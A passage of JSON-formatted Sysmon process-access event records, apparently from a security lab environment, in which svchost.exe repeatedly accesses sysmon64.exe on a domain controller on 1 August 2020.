08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6141,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6142,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6143,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6144,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6145,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6146,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6147,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:01:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6148,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:01:09.225\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:01:09.225","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:01:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
